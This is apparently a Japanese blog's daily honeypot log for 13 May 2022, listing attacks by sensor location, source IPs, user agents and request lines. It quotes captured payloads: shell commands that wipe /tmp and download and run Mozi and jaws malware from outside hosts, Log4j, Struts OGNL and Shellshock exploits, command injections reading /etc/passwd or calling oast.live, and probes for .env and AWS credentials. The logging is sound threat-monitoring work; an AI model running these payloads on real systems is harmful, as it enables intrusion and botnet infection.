2022/05/13 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/05/13分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.envへのスキャン行為
Laravelへのスキャン行為

Location:JP

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Apache Struts 2の脆弱性を狙うアクセス
BIG-IP製品の脆弱性(CVE-2020-5902)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Linear eMerge E3の脆弱性(CVE-2019-7256)を狙うアクセス
Lucee Adminの脆弱性(CVE-2021-21307)を狙うアクセス
Maian Cartの脆弱性(CVE-2021-32172)を狙うアクセス
OpenAMの脆弱性(CVE-2021-35464)を狙うアクセス
OpenDreamBoxの脆弱性を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2018-2894)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
RaspAPの脆弱性(CVE-2021-33357)を狙うアクセス
SCIMonoの脆弱性(CVE-2021-21479)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
VMware View Plannerの脆弱性(CVE-2021-21978)を狙うアクセス
ZeroShell Linux distributionの脆弱性(CVE-2009-0545)を狙うアクセス
ZeroShell Linux distributionの脆弱性(CVE-2020-29390)を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
fuel CMSの脆弱性(CVE-2018-16763)を狙うアクセス
vBulletinの脆弱性(CVE-2019-16759)を狙うアクセス
WordPress Pluginへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:US

ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://163.179.165.247:55075/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:UK

GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.gitへのスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 209.141.59.94/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://210.89.39.75:35243/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:SG

GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget jx.qingdaosheng.com/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget v1.kannimanelaji.com/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：213 (前日比：51)
US：総アクセス数：80 (前日比：7)
UK：総アクセス数：43 (前日比：-105)
SG：総アクセス数：66 (前日比：0)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
138	3.239.96.225	United States
1	13.56.150.187	United States
1	20.101.109.35	United States
1	20.230.129.192	United States
1	24.59.83.11	United States
1	40.77.5.230	United States
1	45.144.112.133	United Kingdom
1	46.249.33.53	Netherlands
14	95.214.235.205	Ukraine
2	109.237.103.9	Russia
2	109.237.103.118	Russia
2	109.237.103.123	Russia
4	128.1.248.42	United States
5	135.125.217.54	France
7	135.125.246.110	France
1	142.93.194.204	United States
1	143.198.235.94	United States
2	157.245.70.127	United States
7	159.203.0.168	United States
1	182.57.122.142	India
2	183.136.225.9	China
8	185.254.196.217	Ukraine
1	192.241.214.22	United States
1	198.235.24.158	United States
2	212.192.246.119	Czechia
3	213.186.1.137	Croatia
1	216.218.206.103	United States
1	220.198.241.220	China
1	222.247.8.76	China

UserAgent一覧

件数	UserAgent
1	`() { :; }; echo ; echo ; /bin/cat /etc/passwd`
11	`-`
1	`Abyssal`
1	`AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9`
1	`Googlebot/2.1 (+http[:]//www[.]google[.]com/bot.html)`
2	`Hello, world`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36`
8	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36`
7	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36`
4	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0`
5	`Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
2	`Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
7	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F`
2	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36`
41	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
3		`\x16\x03\x01\x01D\x01`
2		`\x16\x03\x01`
1	DELETE	`/actuator/gateway/routes/290T4JJHhPpfKJlKTTvhLc2063Q`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
41	GET	`/.env`	HTTP/1.1
1	GET	`/290T4MWimmhxFqdWhKpxVLjkRf9`	HTTP/1.1
1	GET	`/290T4NgbtvHc9Q91DqspvtmBIH4.jsp`	HTTP/1.1
1	GET	`/?location=search`	HTTP/1.1
1	GET	`/?p=1`	HTTP/1.1
1	GET	`/?x=${jndi:ldap://${hostName}.uri.c9tl1qg45cabor0000108nmj5ohp5biqe.oast.live/a}`	HTTP/1.1
1	GET	`/RestAPI/ImportTechnicians`	HTTP/1.1
1	GET	`/STATE_ID/123/agentLogUploader`	HTTP/1.1
1	GET	`/Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command`	HTTP/1.1
1	GET	`/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=290T4ILNBgvHSYSrV0OqXG0PGRm.php&target=l1_Lw`	HTTP/1.1
1	GET	`/ajax/networking/get_netcfg.php?iface=;curl%20http[:]//c9tl1qg45cabor000010cq8sypzk7txpa[.]oast[.]live/`whoami`;`	HTTP/1.1
1	GET	`/api.php?key=1&apikey=1`	HTTP/1.1
1	GET	`/assets/data/usrimg/290t4nzc5gflxsg85jsqy83jpxe.php`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60`	HTTP/1.1
1	GET	`/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/290T4KxvCCFMTWTqCi1KTZUHULc.jsp`	HTTP/1.1
1	GET	`/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW=`	HTTP/1.1
1	GET	`/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22`	HTTP/1.1
1	GET	`/cgi-bin/slogin/login.py`	HTTP/1.1
1	GET	`/cgi-bin/stats`	HTTP/1.1
1	GET	`/cgi-bin/status/status.cgi`	HTTP/1.1
1	GET	`/cgi-bin/status`	HTTP/1.1
1	GET	`/cgi-bin/test-cgi`	HTTP/1.1
1	GET	`/cgi-bin/test`	HTTP/1.1
1	GET	`/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd`
1	GET	`/code?dag_id=example_passing_params_via_test_command`	HTTP/1.1
1	GET	`/debug.cgi`	HTTP/1.1
1	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27`	HTTP/1.1
1	GET	`/help/admin-guide/test.jsp`	HTTP/1.1
1	GET	`/hsqldb%0a`	HTTP/1.1
1	GET	/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D	HTTP/1.1
1	GET	`/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}`	HTTP/1.1
1	GET	/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D	HTTP/1.1
1	GET	`/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}`	HTTP/1.1
1	GET	/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D	HTTP/1.1
1	GET	`/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}`	HTTP/1.1
1	GET	`/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==`	HTTP/1.1
1	GET	`/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23`	HTTP/1.1
1	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}`	HTTP/1.1
1	GET	`/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}`	HTTP/1.1
1	GET	`/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}`	HTTP/1.1
1	GET	`/login?redirect=%2F`	HTTP/1.1
1	GET	`/mgmt/shared/authn/login`	HTTP/1.1
1	GET	`/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1`	HTTP/1.1
1	GET	`/nuclei.txt`	HTTP/1.1
1	GET	`/openam/oauth2/..;/ccversion/Version`	HTTP/1.1
1	GET	`/pages/systemcall.php?command=cat%20/etc/passwd`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
4	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/test.cgi`	HTTP/1.1
1	GET	`/test.txt`	HTTP/1.1
1	GET	`/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license`	HTTP/1.1
1	GET	`/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release`	HTTP/1.1
1	GET	`/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd`	HTTP/1.1
1	GET	`/ui/vropspluginui/rest/services/getstatus`	HTTP/1.1
1	GET	`/users/sign_in`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webadmin/script?command=\|%20nslookup%20c9tl1qg45cabor000010d8zrmi1dqax8q.oast.live`	HTTP/1.1
1	GET	`/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https[:]//c9tl1qg45cabor000010qhxq5zbt3b9qe[.]oast[.]live`	HTTP/1.1
1	GET	`/wp-content/plugins/contact-form-7/readme.txt`	HTTP/1.1
1	GET	`/wp-content/uploads/workreap-temp/290T4Nz9UXdLnXy9ivnbnaLBZf0.php`	HTTP/1.1
1	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
2	HEAD	`/`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/./RestAPI/Connection`	HTTP/1.1
2	POST	`/./RestAPI/LogonCustomization`	HTTP/1.1
1	POST	`/EemAdminService/EemAdmin`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/_async/AsyncResponseService`	HTTP/1.1
6	POST	`/_ignition/execute-solution`	HTTP/1.1
1	POST	`/_search?pretty`	HTTP/1.1
2	POST	`/account`	HTTP/1.1
1	POST	`/actions/authenticate.php`	HTTP/1.1
1	POST	`/actuator/gateway/refresh`	HTTP/1.1
1	POST	`/actuator/gateway/routes/290T4JJHhPpfKJlKTTvhLc2063Q`	HTTP/1.1
2	POST	`/ajax/render/widget_tabbedcontainer_tab_panel`	HTTP/1.1
1	POST	`/api/content/`	HTTP/1.1
1	POST	`/api/timelion/run`	HTTP/1.1
1	POST	`/assets/php/upload.php`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm`	HTTP/1.1
1	POST	`/cgi-bin/libagent.cgi?type=J`	HTTP/1.1
1	POST	`/cgi-bin/login.cgi`	HTTP/1.1
1	POST	`/cgi-bin/system_log.cgi`	HTTP/1.1
1	POST	`/cgi/networkDiag.cgi`	HTTP/1.1
1	POST	`/cgi?2`	HTTP/1.1
1	POST	`/cgi?7`	HTTP/1.1
1	POST	`/cobbler_api`	HTTP/1.1
1	POST	`/confluence/pages/createpage-entervariables.action?SpaceKey=x`	HTTP/1.1
1	POST	`/confluence/pages/createpage-entervariables.action`	HTTP/1.1
1	POST	`/context.json`	HTTP/1.1
1	POST	`/editBlackAndWhiteList`	HTTP/1.1
1	POST	`/en/php/usb_sync.php`	HTTP/1.1
1	POST	`/functionRouter`	HTTP/1.1
1	POST	`/goform/setSysAdm`	HTTP/1.1
1	POST	`/index.php`	HTTP/1.1
1	POST	`/integration/saveGangster.action`	HTTP/1.1
1	POST	`/invoker/EJBInvokerServlet/`	HTTP/1.1
1	POST	`/invoker/JMXInvokerServlet/`	HTTP/1.1
1	POST	`/login.htm`	HTTP/1.1
1	POST	`/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D`	HTTP/1.1
1	POST	`/lucee/290T4OXhWeQOyHt3bFN8LYaqy7S.cfm`	HTTP/1.1
1	POST	`/lucee/admin/imgProcess.cfm?file=/../../../context/290T4OXhWeQOyHt3bFN8LYaqy7S.cfm`	HTTP/1.1
1	POST	`/lucee/admin/imgProcess.cfm?file=/whatever`	HTTP/1.1
1	POST	`/mailingupgrade.php`	HTTP/1.1
1	POST	`/mgmt/shared/authn/login`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
1	POST	`/mifs/.;/services/LogService`	HTTP/1.1
1	POST	`/pages/createpage-entervariables.action?SpaceKey=x`	HTTP/1.1
2	POST	`/pages/createpage-entervariables.action`	HTTP/1.1
1	POST	`/pages/createpage.action?spaceKey=myproj`	HTTP/1.1
1	POST	`/pages/doenterpagevariables.action`	HTTP/1.1
1	POST	`/pages/templates2/viewpagetemplate.action`	HTTP/1.1
1	POST	`/password_change.cgi`	HTTP/1.1
1	POST	`/servlet/UploadServlet`	HTTP/1.1
1	POST	`/sitecore/shell/ClientBin/Reporting/Report.ashx`	HTTP/1.1
1	POST	`/system/sharedir.php`	HTTP/1.1
1	POST	`/template/custom/content-editor`	HTTP/1.1
1	POST	`/templates/editor-preload-container`	HTTP/1.1
1	POST	`/tmui/locallb/workspace/fileSave.jsp`	HTTP/1.1
3	POST	`/tmui/locallb/workspace/tmshCmd.jsp`	HTTP/1.1
1	POST	`/user.action`	HTTP/1.1
1	POST	`/users/user-dark-features`	HTTP/1.1
1	POST	`/var`	HTTP/1.1
1	POST	`/webtools/control/SOAPService`	HTTP/1.1
1	POST	`/wiki/pages/createpage-entervariables.action?SpaceKey=x`	HTTP/1.1
1	POST	`/wiki/pages/createpage-entervariables.action`	HTTP/1.1
1	POST	`/wls-wsat/CoordinatorPortType`	HTTP/1.1
1	POST	`/wp-admin/admin-ajax.php`	HTTP/1.1
1	POST	`/ws_utc/resources/setting/keystore`	HTTP/1.1
1	POST	`/ws_utc/resources/setting/options`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.101.109.35	United States
1	20.203.226.204	United States
11	45.9.20.101	Russia
7	51.79.29.48	Canada
21	94.137.92.14	Russia
2	109.237.103.9	Russia
2	109.237.103.118	Russia
7	118.123.105.85	China
4	128.14.209.162	United States
1	137.184.121.183	United States
1	143.198.235.94	United States
1	159.223.180.164	United States
1	162.142.125.219	United States
1	163.179.165.247	China
7	165.22.127.137	United States
1	172.245.20.219	United States
7	185.254.196.223	Ukraine
1	192.241.221.97	United States
1	193.124.7.9	Czechia
1	213.186.1.137	Croatia

UserAgent一覧

件数	UserAgent
13	`-`
1	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
21	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
